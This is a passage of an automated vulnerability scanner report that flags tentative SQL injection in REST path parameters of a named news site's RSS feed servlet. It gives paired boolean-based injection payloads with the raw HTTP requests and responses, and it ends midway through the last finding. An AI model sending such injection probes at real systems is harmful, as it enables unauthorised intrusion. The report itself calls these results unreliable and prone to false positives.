1.61. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13540988'%20or%201%3d1--%20 and 13540988'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi13540988'%20or%201%3d1--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi13540988'%20or%201%3d2--%20/rss/CustomRssServlet/568/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:30 GMT
Date: Tue, 07 Dec 2010 23:20:30 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.62. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200783.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 39771848%20or%201%3d1--%20 and 39771848%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d1--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d2--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.63. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200784.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200784.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:50 GMT
Date: Tue, 07 Dec 2010 23:20:50 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.64. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200785.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200785.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14698078'%20or%201%3d1--%20 and 14698078'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi14698078'%20or%201%3d1--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:45 GMT
Date: Tue, 07 Dec 2010 23:20:45 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi14698078'%20or%201%3d2--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.65. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10825379'%20or%201%3d1--%20 and 10825379'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi10825379'%20or%201%3d1--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:37 GMT
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi10825379'%20or%201%3d2--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.66. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:51 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.67. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200789.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200789.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13847561'%20or%201%3d1--%20 and 13847561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d1--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d2--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:46 GMT
Content-Length: 0
Connection: close


1.68. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:03 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.69. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
